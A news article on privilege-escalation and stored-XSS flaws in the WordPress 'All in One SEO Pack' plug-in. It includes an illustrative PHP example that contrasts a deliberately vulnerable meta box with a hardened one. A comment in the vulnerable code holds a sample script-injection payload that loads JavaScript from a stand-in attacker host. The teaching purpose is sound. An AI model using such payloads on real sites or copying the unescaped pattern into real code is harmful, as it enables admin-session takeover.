Numerous WordPress websites could be at risk of compromise if their administrators don’t update a popular Search Engine Optimization (SEO) plug-in to a newly released version that fixes serious vulnerabilities.
Web security firm Sucuri found two flaws in the plug-in "All in One SEO Pack", which is currently estimated to be running on more than 15 million of the 73 million WordPress websites. The flaws permit attackers who hold a non-administrative WordPress account to elevate their privileges and inject malicious code into the administration panel. In practice this means an attacker can inject arbitrary JavaScript that runs in an administrator's browser session, and from there do anything the administrator can, from changing the admin account's password to planting a backdoor in the site's files for further malicious activity later.
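The bug class described above, a stored cross-site scripting flaw that turns into privilege escalation because a low-privilege author's input is rendered unescaped on a screen that administrators open, is shown below in an added, illustrative WordPress meta-box example. This is not the plug-in's own code and does not reproduce the actual flaw Sucuri found; every function and meta key prefixed `hypothetical_` is an assumption made for the illustration, while the WordPress API calls (`get_post_meta`, `esc_attr`, `wp_verify_nonce`, `current_user_can`, and so on) are the real ones.

```php
<?php
// Illustrative pattern only (not the real plug-in's code): how a per-post "SEO title"
// field that a Contributor can fill in becomes a takeover of the admin session when
// it is echoed unescaped into an admin-only screen.

// --- Vulnerable pattern (hypothetical) ---
function hypothetical_seo_title_box_vulnerable( $post ) {
    $title = get_post_meta( $post->ID, '_hypothetical_seo_title', true );
    // BUG: a value stored by a Contributor is echoed raw into a page that Editors and
    // Administrators will open, so a payload like
    //   "><script src="//attacker.example/x.js"></script>
    // runs with the administrator's cookies and nonces.
    echo '<input type="text" name="hypothetical_seo_title" value="' . $title . '">';
}

function hypothetical_save_seo_title_vulnerable( $post_id ) {
    if ( isset( $_POST['hypothetical_seo_title'] ) ) {
        // BUG: no nonce, no capability check, no sanitization of what is stored.
        update_post_meta( $post_id, '_hypothetical_seo_title', $_POST['hypothetical_seo_title'] );
    }
}

// --- Hardened pattern ---
function hypothetical_seo_title_box_fixed( $post ) {
    $title = get_post_meta( $post->ID, '_hypothetical_seo_title', true );
    wp_nonce_field( 'hypothetical_seo_title_save', 'hypothetical_seo_title_nonce' );
    // Output escaping is the control that actually stops the XSS: whatever was stored,
    // esc_attr() turns quotes and angle brackets into entities, so the value cannot
    // break out of the attribute.
    echo '<input type="text" name="hypothetical_seo_title" value="' . esc_attr( $title ) . '">';
}

function hypothetical_save_seo_title_fixed( $post_id ) {
    // Reject forged requests (CSRF) before touching anything.
    if ( ! isset( $_POST['hypothetical_seo_title_nonce'] )
        || ! wp_verify_nonce( $_POST['hypothetical_seo_title_nonce'], 'hypothetical_seo_title_save' ) ) {
        return;
    }
    // Only someone allowed to edit this particular post may change its SEO data.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    if ( isset( $_POST['hypothetical_seo_title'] ) ) {
        // Input sanitization is defence in depth; it strips tags and control characters
        // but does not replace the output escaping above.
        update_post_meta(
            $post_id,
            '_hypothetical_seo_title',
            sanitize_text_field( wp_unslash( $_POST['hypothetical_seo_title'] ) )
        );
    }
}

add_action( 'save_post', 'hypothetical_save_seo_title_fixed' );
add_action( 'add_meta_boxes', function () {
    add_meta_box( 'hypothetical_seo_title', 'SEO title', 'hypothetical_seo_title_box_fixed', 'post' );
} );
```

The point worth taking from the pair is that the fix has two independent halves: the capability and nonce checks decide who may write the field, and `esc_attr()` decides what the stored value can do when an administrator reads it. Either half alone leaves an avenue open, since a user who legitimately passes the capability check can still store a script if output is not escaped.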
WordPress site administrators are advised to upgrade the plug-in to version 2.1.6, which was released Sunday in the WordPress add-ons repository. The update can also be initiated from the plug-in's administration panel. Updating closes the hole but does not undo anything an attacker may already have done with it, so sites that ran a vulnerable version with untrusted non-administrative users should also review administrator accounts and recent password changes and look for unexpected files or modified plug-in and theme code.